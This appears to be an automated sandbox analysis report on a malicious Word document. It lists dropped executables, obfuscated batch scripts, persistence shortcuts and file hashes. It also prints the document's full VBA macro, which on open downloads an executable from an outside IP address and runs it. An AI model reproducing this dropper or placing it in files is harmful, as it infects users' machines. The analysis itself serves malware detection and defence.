Preview:	@echo off..@%.. ..%e%r.%c%...r.%h%..%o%r........% %....%o%. ..%f%..........%f%....%..s%. ......%e%.... ...%t%.% %.. o..o.%"%r.r.......%x%.......%u%..o..... %u%.%y%.......%=%o..r..%s%..%e% o%t%r.......% %..o%"%..r.....%..%xuuy%"%.........%J%...%o%..r ....%Z%...%u%.......%=%.%=%..%"%..........%..%xuuy%"%....%s%.......%F%..r..o..o%o%.......%F%.... .....%G%..%l%.r... ....%F%.%k%.%a%. ...%g%ro.. %%JoZu%h%.%2% ...r.%s%..........%h% %"%... .....%..%xuuy%"%......%H%..%O%.....r..%D%.. .%B%..... ...%e%.....

C:\Users\Public\Libraries\Nsltarpn

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	data
Category:	dropped
Size (bytes):	587005
Entropy (8bit):	7.97982343807899
Encrypted:	false
SSDEEP:	12288:7uJf6JY7FoblH0FkRaIHJ4tw0nCdxeJSRrUe9dZA:74f6q7Fw4Ga1twkqxegRoE0
MD5:	C7A8C9CCD0074118575324C6AD87285B
SHA1:	5FEE525990BE478BD0DD9C38BB65315A1140190C
SHA-256:	D228F49F052E95B267E4DAB42958B8A039884A42C03857B3928C48F311FE3DFD
SHA-512:	D10673B750FF592EFB0BD0A5DD5A9260AB1ACB33635D1985DEAB716BAE20C1C7F9195EF6208DA7EAEE8F97C2A6B5832AB9DAA593FDC78A32268CC993E8B7771E
Malicious:	true
Preview:	.....a...{..a..R...L..kJ..d...A.x.3%.>...F..:...;..-.w.,..9.w..?..9.q.a.-E..Q..@..6..32..O.....\,...k.H.y..y.J.s )..,.ug....gz..D..1..)...D..=. p.f.k.!w.@&$....qX.y.B.s_.~.6.z#K..g..OY.j.....y...s.2....i.-..gt..d......7....H[...\|K_.....z\..o#.}.a._..e.....2.t.f..:.t.R.-.....e.....>.....a../...U.%)..N....L./M.X.3W.....1$&.....A...S..U..1...(&${_.....C........ ).[!..Z..y.H.s....:...Xk.-%.._s..-x.2n.[W..L..J_.=n.X..x7j.P..y..=...&$u..K...o.G4..\|...;A.l...7.j....b.p..h X..E..Z.k>..P.x>...;.r.....! ]...o..F..^...-..O..F ..(....R....]E.r&$.d.-....`...<.>y.S...FY.\....?.q.e..M..._.. .h.DE..S.k.9.&&4....m$&6..\|T>.#7..........=.r.}.F......7.(.....q...J..p3..M4.....D....1...i.).x.On......k.c"..9..8"..F...?.l.V..W...?..L.;...\|.S.xS..?.o.?^.u.(..,.p...vN...R.s.S..^.{.`..)...1..f...8......R...a.._..J...y.<C.#9~i!6..M...\..J.P.D..6.....@...W.H>.%0...t...a...X..v.K..S...E%4^..0.i.........DQ.{..gT..p4...Y.h..h&$_....&$).....`...Gy.4.j./..N...P..P...c..Q..

C:\Users\Public\Libraries\Nsltarpn.PIF

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	854016
Entropy (8bit):	7.016259509125634
Encrypted:	false
SSDEEP:	12288:aAm99652dKVsiJ9Pu8BHTN3KxxcycdnawpVdAorkBK1zmQ7HDEKDmC/E:7oqcKmiJ88ZZsTzOlIWznHY
MD5:	AEA0BCDBDDBEABFDE26F53671890D1B7
SHA1:	5A3CB9126F222BAB082EAE67E961D45A5E0529E4
SHA-256:	4E38DF6415CD9A8857C5FF4185DA103FA8585E8A589FF2286EAF7317E3D10755
SHA-512:	5701919429CA56E0A885DCF3C7A05C5C60974738371C55E844E78A841D13080CC93278CCF96372ED4EC616247D09587CFFE005A4607A7949C7DCE123701DFDCF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h..........Tw............@..............................................@..............................t$...........................0...^........................... .......................................................text...._.......`.................. ..`.itext.......p.......d.............. ..`.data................l..............@....bss.....6...............................idata..t$.......&..................@....tls....4................................rdata....... ......................@..@.reloc...^...0...`..................@..B.rsrc...............................@..@....................................@..@................................................................................................

C:\Users\Public\Libraries\YKA

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:3:3
MD5:	844AFD44FF5361DF28129DF1E3EF8915
SHA1:	E925CC2BDC642A0866A7DD5A95F1F9D220B5856E
SHA-256:	24BA1E99DC06B19351323AAE0D7370243D586475A634B7F6FF7927FBC72CFAED
SHA-512:	C6775D4704C041DE26B0B56E2682F68FC63CE496BFDAD155DCB794ADE68183F2FF2DA8ECF1E8C6C70F6BFAB074E7A2C238DECC9CE25C244D1127834CF7429D56
Malicious:	false
Preview:	3..

C:\Users\Public\Libraries\npratlsN.pif

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: PI ITS15235.doc, Detection: malicious, Browse Filename: PO#3_RKG367.bat, Detection: malicious, Browse Filename: ENQ-0092025.doc, Detection: malicious, Browse Filename: yxU3AgeVTi.exe, Detection: malicious, Browse Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse Filename: PI ITS15235.doc, Detection: malicious, Browse Filename: PO#5_Tower_049.bat, Detection: malicious, Browse Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse Filename: PO_B2W984.com, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Nsltarpn.url

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.08452517536887
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMWJREXVLBCSsbxfjKuA0vn:HRYFVmTWDyzsVLBCSExfjKWn
MD5:	BAE3C9A7EBA611959BAC37601D854A59
SHA1:	2A34B188F20CADBFDA252BA9A612AAB3451F23D0
SHA-256:	3D9AC35C3230BFAF4D10EDC1340319B138427ABB5B8DC803B3D2FCFBCD79252A
SHA-512:	1317F93E4D0C984C9E2062838E32C6FCAED428EB2B6BE9B4E57E5BB3520B53FF82696F730C1AB6CD2FF0B512C917BB0DAFF47D96A5449CF8C368BC7D26610B21
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF"..IconIndex=964847..HotKey=77..

C:\Users\Public\NsltarpnF.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	11278
Entropy (8bit):	4.653311201735178
Encrypted:	false
SSDEEP:	192:aMDConKxnlt4iVNt4BIvf6hJyMCdvWr3YGjZq3W4ERrr83hGgPKnrJTFlmwu26:BDWxl+mymfbMAM83WMgguTFlj96
MD5:	F82AEB3B12F33250E404DF6EC873DD1D
SHA1:	BCF538F64457E8D19DA89229479CAFA9C4CCE12F
SHA-256:	23B7417B47C7EFB96FB7CE395E325DC831AB2EE03EADDA59058D31BDBE9C1EA6
SHA-512:	6F9D6DAEED78F45F0F83310B95F47CC0A96D1DB1D7F6C2E2485D7A8ECB04FEE9865EEC3599FEE2D67F3332F68A70059F1A6A40050B93EF44D55632C24D108977
Malicious:	false
Preview:	@echo off..@%..%e%....%c% .%h%.. ......%o%.o.....o..% %.........%o%....r....%f%.o........%f%.....%..s%..... ...%e% r.r.. ...%t%..........% %.... %"%.......%I%..........%F%..%X%o....r..%Q%...o.%=%. ...%s%o..%e%... %t%. o. .% %..%"%..%..%IFXQ%"%..%w%..%S%..... .%c%.....%t%..r.......%=%.%=%....%"%.....%..%IFXQ%"%or.....%d%.........%s%...%b%o.r%m% .....r...%U% .. ..o...%U%.o%u%.... .%r%.........%v%...r..%s%...... ...%%wSct%C%.......%l%..r.%o%....%a%..r....r%"%.....o....%..%IFXQ%"%... .o...%y% %h%r.%R%....

C:\Users\user\AppData\Local\Temp\~DFCFF1A1E34A46A163.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$ ITS15235 (2).doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.7836946949499355
Encrypted:	false
SSDEEP:	3:klt+lllVUrXEPmMltn/lfll8DkwRz8:7tUX+XnigJ
MD5:	F42D6CEE4CB0ECCA5872EE58D27313BB
SHA1:	8308F7EDEF176DF1A512F09185F96EAE93EE5D1C
SHA-256:	C9923D6F1CD48F0633DCE4E29A000EFA228A825A1876DA4F0D8A0B97F34030A1
SHA-512:	42098E007D096D40EB6D6B7E080EAA09D795A79CD94333485B1A3D2290A14A0A2822FF545BAA6CF860ACFD3BF5305C203F7036AD0B4C3DD0A5B75C7DD1D59C12
Malicious:	false
Preview:	.user.................................................a.l.f.o.n.s...0........>f.........a.i.............................................>f.L(..}..i....X....=.i

C:\Windows \SysWOW64\NETUTILS.dll

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119033
Entropy (8bit):	5.148072354937474
Encrypted:	false
SSDEEP:	1536:BDzIi47phID3zvyDXthSmsVBc2w5jEjISsnEICl7MbiRwRkSYJQ:BDz47pq/6hShc2ljISsnEGRkSYJQ
MD5:	A88976A70AED45F610A032E438A82A95
SHA1:	EC20B0F0D6CCC848C8FFA857AB4E771672DFA4F2
SHA-256:	F3D5A6EBCD8CAB3CC9A98488B23C2DE740C6EF04E33ED317A3E2A047D53D169B
SHA-512:	EC77BB81B9E6DE4AF8A17EB26281D10FC9A05947D588F2EE3680ADA67ED28118FBC9A2D0E63BF0ECC2A4C318555A4F27E72ECF1A530A506E9B4FBF5EFDB4F676
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.d........& .....(...$................<a.............................0.......s........ .........................................@....................`..p...............\........................... ...(.................................................... ....'.......(.................. .P`. ...P....@......................@.p.. .......P.......4..............@.P@. ..p....`.......:..............@.0@. ..0....p.......>..............@.0@. ..................................p.. ..@............B..............@.0@. ...............D..............@.0.. ....X............L..............@.@.. ....h............N..............@.`.. ..\............P..............@.0B/4...................R..............@.PB/19..................V..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Windows \SysWOW64\svchost.pif

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	96448
Entropy (8bit):	5.1636650991276305
Encrypted:	false
SSDEEP:	1536:dhJfbGY/Bn623Kvv0IzGJyyu2xXibswbTYTjULf1YrfspZPgpzF:dhJfbG6B6yKvv0uWyyu2xXibswbQjUjs
MD5:	869640D0A3F838694AB4DFEA9E2F544D
SHA1:	BDC42B280446BA53624FF23F314AADB861566832
SHA-256:	0DB4D3FFDB96D13CF3B427AF8BE66D985728C55AE254E4B67D287797E4C0B323
SHA-512:	6E775CFB350415434B18427D5FF79B930ED3B0B3FC3466BC195A796C95661D4696F2D662DD0E020C3A6C3419C2734468B1D7546712ECEC868D2BBFD2BC2468A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R#.<p.<p.<p..p.<p..?q.<p..9q.<p..=q.<p.=p..<p..4q.<p..8q.<p...p.<p..>q.<pRich.<p........................PE..d....C~..........."............................@.............................`....................... ...............................................@....... ..<....P...(...P..`.......T...........................0...@...........p...........`....................text.............................. ..`.imrsiv..................................rdata...[.......`..................@..@.data...............................@....pdata..<.... ......................@..@.didat..0....0....... ..............@....rsrc........@.......0..............@..@.reloc..`....P.......@..............@..B........................................................................................................................................................................

C:\Windows\SysWOW64\brightness.exe

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	854016
Entropy (8bit):	7.016259509125634
Encrypted:	false
SSDEEP:	12288:aAm99652dKVsiJ9Pu8BHTN3KxxcycdnawpVdAorkBK1zmQ7HDEKDmC/E:7oqcKmiJ88ZZsTzOlIWznHY
MD5:	AEA0BCDBDDBEABFDE26F53671890D1B7
SHA1:	5A3CB9126F222BAB082EAE67E961D45A5E0529E4
SHA-256:	4E38DF6415CD9A8857C5FF4185DA103FA8585E8A589FF2286EAF7317E3D10755
SHA-512:	5701919429CA56E0A885DCF3C7A05C5C60974738371C55E844E78A841D13080CC93278CCF96372ED4EC616247D09587CFFE005A4607A7949C7DCE123701DFDCF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h..........Tw............@..............................................@..............................t$...........................0...^........................... .......................................................text...._.......`.................. ..`.itext.......p.......d.............. ..`.data................l..............@....bss.....6...............................idata..t$.......&..................@....tls....4................................rdata....... ......................@..@.reloc...^...0...`..................@..B.rsrc...............................@..@....................................@..@................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GRACE, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 16 00:29:00 2025, Last Saved Time/Date: Thu Jan 16 00:29:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	7.057940875709793
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	PI ITS15235 (2).doc
File size:	146'944 bytes
MD5:	059f7753a76e86c8ed56f480041d631f
SHA1:	c356187bee23b8930e82ba2cea112873b39567d4
SHA256:	ce3681ec2e62af9f0231b1a32a7319766d8193d0ff86c69691176f4cd404f129
SHA512:	94ce1aff40a57a963dabec69fbc969dbc27ff7289ca07a21233379a415cca52fbc69cbab722afef149077ab3647798192332b6afd5500d3189206728dc22f81b
SSDEEP:	1536:17dgmjjy2lQkySTUb2roegTK+g9WomfaQjSqttJnkL5mS9kBwNR42q3V:1ZPjbTU+J799IjSqtteL5N9kBF2
TLSH:	EBE3C447A9448B43E03493B5BE435FAD2F197E0CA9866AEF11273E9B3D302324D4E16D
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "PI ITS15235 (2).doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:	GRACE
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	GRACE
Revion Number:	2
Total Edit Time:	0
Create Time:	2025-01-16 00:29:00
Last Saved Time:	2025-01-16 00:29:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 4807

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	4807
Data ASCII:	. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i .
Data Raw:	01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 2d a5 15 a8 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/albt"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.24379920956187054
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.45216486890509433
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G R A C E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7007

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	7007
Entropy:	5.870499893122138
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 113648, 1st item "TRC", Stream Size: 113648

General
Stream Path:	Data
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 113648, 1st item "TRC"
Stream Size:	113648
Entropy:	7.649762052434011
Base64 Encoded:	True
Data ASCII:	. . D . d . . . . . . . . . . . . . . . . . . . . . / = ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . s . . > . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . R . . , . . . . Z . . 7 J 2 9 ( . . . . . . . . D . . . . . . . F . . . . Z . . 7 J 2 9 ( . . J F I F . . . . . . . . . I C C _ P R O F I L E . . . . . . . . . . . . . . . m
Data Raw:	f0 bb 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2f e0 3d 60 03 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 70 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 3e 00 00 00 7f 00 80 00 e1 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 374

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	374
Entropy:	5.330348434384084
Base64 Encoded:	True
Data ASCII:	I D = " { 8 4 F C 5 0 E E - 6 C 8 3 - 4 5 F 2 - A 0 3 1 - 9 2 5 7 D F 4 3 7 E 6 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 1 2 3 F 5 F 3 F 9 F 3 F 9 F 3 F 9 F 3 F 9 " . . D P B = " 5 C 5 E 8 8 0 9 F 8 4 5 F 9 4 5 F 9 4 5 " . . G C = " 9 7 9 5 4 3 5 2 4 5 B 6 8 1 B 7 8 1 B 7 7 E " . . . . [ H o s t E x t e n d e r I n f o ]
Data Raw:	49 44 3d 22 7b 38 34 46 43 35 30 45 45 2d 36 43 38 33 2d 34 35 46 32 2d 41 30 33 31 2d 39 32 35 37 44 46 34 33 37 45 36 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2910
Entropy:	4.354647938851436
Base64 Encoded:	False
